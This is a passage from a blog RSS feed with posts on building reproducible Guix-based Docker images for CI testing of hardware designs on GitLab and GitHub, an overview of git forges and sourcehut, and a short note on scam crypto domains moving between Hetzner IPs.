idea ?). It also includes a container registry, and the set of features if offers may be exchanged with ease with any other #gitforge following the same paradigm. No need to go into more details. br/&#xA;There is a couple of interesting tips about using #github, though. It happens more usually than not that users encounter frequently problems of #reproducibility when using container images hosted on ghcr.io, the hosting service for user images. These images are usually employed for running #ci testing pipelines, and they usually break as upstream changes happen: updates, image definition changes, image packages upgrades, etc. If you read my dependencies hell post, this should ring a bell. br/&#xA;What can be done about in what concerns #modernhw ? Well, we have #guix. Let’s try a differente approach: building an image locally, and pushing it to #github registry. Let’s see how. br/&#xA;&#xA;in practice&#xA;&#xA;An example repository shows tha way to proceed. Its contents allow to create a docker container image to be hosted remotely. It includes all that’s necessary to perform remote #ci testing of a #modernhw #vhdl design. br/&#xA;&#xA;docker pull ghcr.io/csantosb/hdl&#xA;docker images # check $ID&#xA;docker run -ti $ID bash&#xA;&#xA;It includes a couple of #plaintext files to produce a #deterministic container. First, the channels.scm file with the list of guix chanels to use to pull packages from. Then, a manifest.scm, with the list of packages to be install within the container. br/&#xA;The image container may be build with br/&#xA;&#xA;image=$(guix time-machine --channels=channels.scm -- \&#xA;             pack -f docker \&#xA;             -S /bin=bin \&#xA;             --save-provenance \&#xA;             -m manifest.scm)&#xA;&#xA;At this point, it is to be load to the docker store with br/&#xA;&#xA;docker load &lt; $image&#xA;docker images&#xA;&#xA;Now it is time to tag the image br/&#xA;&#xA;docker tag IMID ghcr.io/USER/REPO:RELEASE&#xA;&#xA;and login to ghcr.io br/&#xA;&#xA;docker login -u USER -p PASSWORD ghcr.io&#xA;&#xA;Finally, the image is to be push remotely br/&#xA;&#xA;docker push ghcr.io/USER/HDL:RELEASE&#xA;&#xA;test&#xA;&#xA;You’ll may test this image using the neorv32 project, for example, with: br/&#xA;&#xA;docker pull ghcr.io/csantosb/hdl&#xA;docker run -ti ID bash&#xA;git clone --depth=1 https://github.com/stnolting/neorv32&#xA;cd neorv32&#xA;git clone --depth=1 https://github.com/stnolting/neorv32-vunit test&#xA;cd test&#xA;rm -rf neorv32&#xA;ln -sf ../../neorv32 neorv32&#xA;python3 sim/run.py --ci-mode -v&#xA;`]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/gitlab.png" alt="img"> <br/>
Remote #ci is the <a href="https://infosec.press/csantosb/tag:ciseries" rel="nofollow">way to go</a> in #modernhw digital design testing. In this #ciseries, let’s see it in practice with some detail using two of the most popular forges out there.  <br/></p>

<h1 id="gitlab">Gitlab</h1>

<p>The <a href="https://gitlab.com/" rel="nofollow">gitlab</a> #gitforge includes tones of features. Among these, a facility called the <a href="https://docs.gitlab.com/ee/user/packages/container_registry/" rel="nofollow">container registry</a>, which stores per project container images. <a href="https://infosec.press/csantosb/guix-crash-course#packs" rel="nofollow">Guix pack</a> allows the creation of custom #reproductible environments as images. In particular, it is possible to create a docker image out of our <a href="https://infosec.press/csantosb/guix-crash-course#manifest-channels" rel="nofollow">manifest and channels files</a> with <br/></p>

<pre><code class="language-sh">guix time-machine -C channels.scm -- pack --compression=xz --save-provenance -f docker -m manifest.scm
</code></pre>

<p>Check the <a href="https://guix.gnu.org/manual/en/html_node/Invoking-guix-pack.html" rel="nofollow">documentation</a> for options. <br/>
Remember that there are obviously alternative methods to produce docker images. The point on using guix resides on its <a href="https://infosec.press/csantosb/use-guix#reproducibility" rel="nofollow">reproducibility</a> capabilities: you’ll be able to create a new, identical docker image, out of the <a href="https://infosec.press/csantosb/guix-crash-course#manifest-channels" rel="nofollow">manifest and channels files</a> at any point in time. Even more: you’ll have the capacity to retrieve your manifest file out of the binary image in case your manifest file gets lost. <br/>
Then, this image must be loaded into the local docker store with <br/></p>

<pre><code class="language-shell">docker load &lt; IMAGE
</code></pre>

<p>and renamed to something meaningful <br/></p>

<pre><code class="language-shell">docker tag IMAGE:latest gitlab-registry.whatever.fr/domain/group/NAME:TAG
</code></pre>

<h2 id="go-remote">go remote</h2>

<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ci2.png" alt="img"> <br/>
Finally, pushed to the remote container registry of your project with <br/></p>

<pre><code class="language-shell">docker push gitlab-registry.whatever.fr/domain/group/NAME:TAG
</code></pre>

<p>At this point, you have an environment where you’ll run your tests using <a href="https://docs.gitlab.com/ee/ci/" rel="nofollow">gitlab&#39;s ci</a> features. You’ll set up your gitlab’s <a href="https://docs.gitlab.com/runner/" rel="nofollow">runners</a> and <a href="https://docs.gitlab.com/ee/ci/#step-1-create-a-gitlab-ciyml-file" rel="nofollow">manifest files</a> to use this container to execute your jobs. <br/>
As an alternative, you could use a <a href="https://docs.gitlab.com/runner/executors/ssh.html" rel="nofollow">ssh executor</a> running on your own fast and powerful hardware resources (dedicated machine, shared cluster, etc.). In this case, you’d rather produce an apptainer  container image with: <br/></p>

<pre><code class="language-sh">guix time-machine -C channels.scm -- pack -f squashfs ...
</code></pre>

<p><code>scp</code> this container file to your computing resources and call it from the #gitlab runner. <br/></p>

<h1 id="github">Github</h1>

<p>The <a href="https://github.com/" rel="nofollow">github</a> is probably the most popular #gitforge out there. It follows a similar to #gitlab in its conception (pull requests and merge requests, you catch the idea ?). It also includes a <a href="https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-container-registry" rel="nofollow">container registry</a>, and the set of features if offers may be exchanged with ease with any other #gitforge following the same paradigm. No need to go into more details. <br/>
There is a couple of interesting tips about using #github, though. It happens more usually than not that users encounter frequently problems of #reproducibility when using container images hosted on <code>ghcr.io</code>, the hosting service for user images. These images are usually employed for running #ci testing pipelines, and they <a href="https://github.com/stnolting/neorv32/issues/1116#issuecomment-2532796271" rel="nofollow">usually break</a> as upstream changes happen: updates, image definition changes, image packages upgrades, etc. If you read my <a href="https://infosec.press/csantosb/on-dependencies" rel="nofollow">dependencies hell</a> post, this should ring a bell. <br/>
What can be done about in what concerns #modernhw ? Well, we have #guix. Let’s try a differente approach: building an image locally, and pushing it to #github registry. Let’s see how. <br/></p>

<h2 id="in-practice">in practice</h2>

<p>An <a href="https://github.com/csantosb/hdl-image.git" rel="nofollow">example repository</a> shows tha way to proceed. Its contents allow to create a docker container image to be hosted remotely. It includes <a href="https://raw.githubusercontent.com/csantosb/hdl-image/refs/heads/master/manifest.scm" rel="nofollow">all that’s necessary</a> to perform remote #ci testing of a #modernhw #vhdl design. <br/></p>

<pre><code class="language-sh">docker pull ghcr.io/csantosb/hdl
docker images # check $ID
docker run -ti $ID bash
</code></pre>

<p>It includes a couple of #plaintext <a href="https://infosec.press/csantosb/guix-crash-course#manifest-channels" rel="nofollow">files</a> to produce a #deterministic container. First, the <a href="https://github.com/csantosb/hdl-image/blob/master/channels.scm" rel="nofollow">channels.scm</a> file with the list of guix chanels to use to pull packages from. Then, a <a href="https://github.com/csantosb/hdl-image/blob/master/manifest.scm" rel="nofollow">manifest.scm</a>, with the list of packages to be install within the container. <br/>
The image container may be <a href="https://git.sr.ht/~csantosb/hdl-image/tree/b1ab9a56802e56e3326c8985bd1b61c93173c5ab/readme.org#L3" rel="nofollow">build</a> with <br/></p>

<pre><code class="language-sh">image=$(guix time-machine --channels=channels.scm -- \
             pack -f docker \
             -S /bin=bin \
             --save-provenance \
             -m manifest.scm)
</code></pre>

<p>At this point, it is to be load to the docker store with <br/></p>

<pre><code class="language-sh">docker load &lt; $image
# docker images
</code></pre>

<p>Now it is time to tag the image <br/></p>

<pre><code class="language-sh">docker tag IMID ghcr.io/USER/REPO:RELEASE
</code></pre>

<p>and login to <code>ghcr.io</code> <br/></p>

<pre><code class="language-sh">docker login -u USER -p PASSWORD ghcr.io
</code></pre>

<p>Finally, the image is to be push remotely <br/></p>

<pre><code class="language-sh">docker push ghcr.io/USER/HDL:RELEASE
</code></pre>

<h2 id="test">test</h2>

<p>You’ll may test this image using the <a href="https://github.com/stnolting/neorv32" rel="nofollow">neorv32</a> project, for example, with: <br/></p>

<pre><code class="language-sh">docker pull ghcr.io/csantosb/hdl
docker run -ti ID bash
git clone --depth=1 https://github.com/stnolting/neorv32
cd neorv32
git clone --depth=1 https://github.com/stnolting/neorv32-vunit test
cd test
rm -rf neorv32
ln -sf ../../neorv32 neorv32
python3 sim/run.py --ci-mode -v
</code></pre>
]]></content:encoded>
      <author>csantosb</author>
      <guid>https://infosec.press/read/a/fw7j3plr28</guid>
      <pubDate>Wed, 11 Dec 2024 12:50:04 +0000</pubDate>
    </item>
    <item>
      <title>git forges</title>
      <link>https://infosec.press/csantosb/git-forges</link>
      <description>&lt;![CDATA[img br/&#xA;Using #git is not the whole picture on #modernhw version control landscape. Git is great when one decides to locally follow changes, take diffs, create branches and so on. When it comes to collaboration with other people or to create a community around a common project, the need for extra tooling arises, and it becomes evident that git alone is not enough. A #gitforge fills this gap. !--more-- br/&#xA;Git bare repositories are a means of sharing the local git history remotely. Bares doesn’t show the worktree, as they are used solely as a common exchange place. This might be a remote server accessible through ssh, for example. Several different users may collaborate this way, provided they agree on a common workflow. Bares are more than enough for some needs. A front end on top of it may help to get an overview of what is going on and to take a look at branches, users and the like. All it takes to make this workflow useful is a little management, as git was designed with a fully distributed architecture in mind. Check the docs for more details. br/&#xA;Now, this approach is a bit too bare bones for most people. On top of bare git repositories, some decided to add extra functionality to ease using git remotely, calling for contributors attracted by buttons, colors, menus and most generally, being used to web frontends. Web forges include all usual suspects (project creation and configutation, markup rendering, user account and authorizations, project overview, etc.), as well as more advanced features (continuous integration, #ci, for testing and deployment with git hooks, wikis, code linters, built in actions, issue tracking, etc.). They abstract the use of git showing diffs, logs, issues threads, etc. As any other web gui tool, they come with its own set of inconvenients in what concern user freedom. br/&#xA;Popular examples are all around. #Gitlab may be deployed as a custom (not federated) instance, and is commonly found in research and public institutions; codeberg, based on forgejo, is a great example of how to deploy a lightweight #freesoftware instance of a collaborative forge (and the promise to federate on the fediverse). Many others exist, which more or less features, bells and whistles. You always have the choice. br/&#xA;&#xA;sourcehut&#xA;&#xA;#Sourcehut, as a collaborative platform, deserves special attention. It departs from mainstream forges, following a different paradigm based on the most robust, distributed and flexible technology at our hands since decades, plain text #email. Git, since its origins, includes a close integration with email, as they both share a distributed philosophy, avoiding central point of failure silos (surprising how mosft git forges tend to concentrate in silos). Sourcehut core architecture is based on mail exchange, patches and #maillists, which turns out to be a much more flexible approach than that of what most forges propose. Their concept of project goes well beyond that of usual workflows, integrating nicely git with email, wikis, bug trackers and build features. They’re still in an alpha stage, so expect the best still to come. br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/forge.png" alt="img"> <br/>
Using #git is not the whole picture on #modernhw version control landscape. Git is great when one decides to locally follow changes, take diffs, create branches and so on. When it comes to collaboration with other people or to create a community around a common project, the need for extra tooling arises, and it becomes evident that git alone is not enough. A #gitforge fills this gap.  <br/>
<a href="https://git-scm.com/book/en/v2/Git-on-the-Server-Getting-Git-on-a-Server" rel="nofollow">Git bare repositories</a> are a means of sharing the local git history remotely. Bares doesn’t show the worktree, as they are used solely as a common exchange place. This might be a remote server accessible through ssh, for example. Several different users may collaborate this way, provided they agree on a common workflow. Bares are more than enough for some needs. A front end on top of it may help to get an overview of what is going on and to take a look at branches, users and the like. All it takes to make this workflow useful is a little management, as git was designed with a fully distributed architecture in mind. Check the docs for more details. <br/>
Now, this approach is a bit too bare bones for most people. On top of bare git repositories, some decided to add extra functionality to ease using git remotely, calling for contributors attracted by buttons, colors, menus and most generally, being used to web frontends. Web forges include all usual suspects (project creation and configutation, markup rendering, user account and authorizations, project overview, etc.), as well as more advanced features (continuous integration, #ci, for testing and deployment with git hooks, wikis, code linters, built in actions, issue tracking, etc.). They abstract the use of git showing diffs, logs, issues threads, etc. As any other web gui tool, they come with its own set of inconvenients in what concern user freedom. <br/>
Popular examples are all around. #Gitlab may be deployed as a custom (not federated) instance, and is <a href="https://about.gitlab.com/" rel="nofollow">commonly found</a> in research and public institutions; <a href="https://codeberg.org/" rel="nofollow">codeberg</a>, based on <a href="https://forgejo.org/" rel="nofollow">forgejo</a>, is a great example of how to deploy a lightweight #freesoftware instance of a collaborative forge (and the promise to federate on the <a href="https://www.fediverse.to/" rel="nofollow">fediverse</a>). Many others exist, which more or less features, bells and whistles. You always <a href="https://drewdevault.com/2022/03/29/free-software-free-infrastructure.html" rel="nofollow">have the choice</a>. <br/></p>

<h1 id="sourcehut">sourcehut</h1>

<p>#Sourcehut, as a collaborative platform, deserves special attention. It departs from mainstream forges, following a <a href="https://begriffs.com/posts/2018-06-05-mailing-list-vs-github.html" rel="nofollow">different paradigm</a> based on the most robust, distributed and flexible technology at our hands since decades, <a href="https://useplaintext.email/" rel="nofollow">plain text</a> #email. Git, since its origins, includes a close integration with email, as they both share a distributed philosophy, avoiding central point of failure silos (surprising how mosft git forges tend to concentrate in silos). <a href="https://drewdevault.com/2018/07/02/Email-driven-git.html" rel="nofollow">Sourcehut</a> core architecture is based on mail exchange, patches and #maillists, which turns out to be a much more flexible approach than that of what most forges propose. Their concept of project goes well beyond that of usual workflows, integrating nicely git with email, wikis, bug trackers and build features. They’re still in an alpha stage, so expect the best still to come. <br/></p>
]]></content:encoded>
      <author>csantosb</author>
      <guid>https://infosec.press/read/a/3eb42u3c9w</guid>
      <pubDate>Sun, 08 Dec 2024 22:36:11 +0000</pubDate>
    </item>
    <item>
      <title>From 49.12.82.250 to 195.201.173.222</title>
      <link>https://infosec.press/ducks/from-49-12-82-250-to-195-201-173-222</link>
      <description>&lt;![CDATA[From 49.12.82.250 to 195.201.173.222&#xA;Lots of domains moved , both ips in Hetzner space.&#xA;Many of the domains are fake crypto investing sites #cryptoscam.&#xA;And other scam sites.]]&gt;</description>
      <content:encoded><![CDATA[<p>From 49.12.82.250 to 195.201.173.222
Lots of domains moved , both ips in Hetzner space.
Many of the domains are fake crypto investing sites #cryptoscam.
And other scam sites.</p>
]]></content:encoded>
      <author>Ducks</author>
      <guid>https://infosec.press/read/a/3f1e93b5rh</guid>
      <pubDate>Tue, 03 Dec 2024 18:39:42 +0000</pubDate>
    </item>
  </channel>
</rss>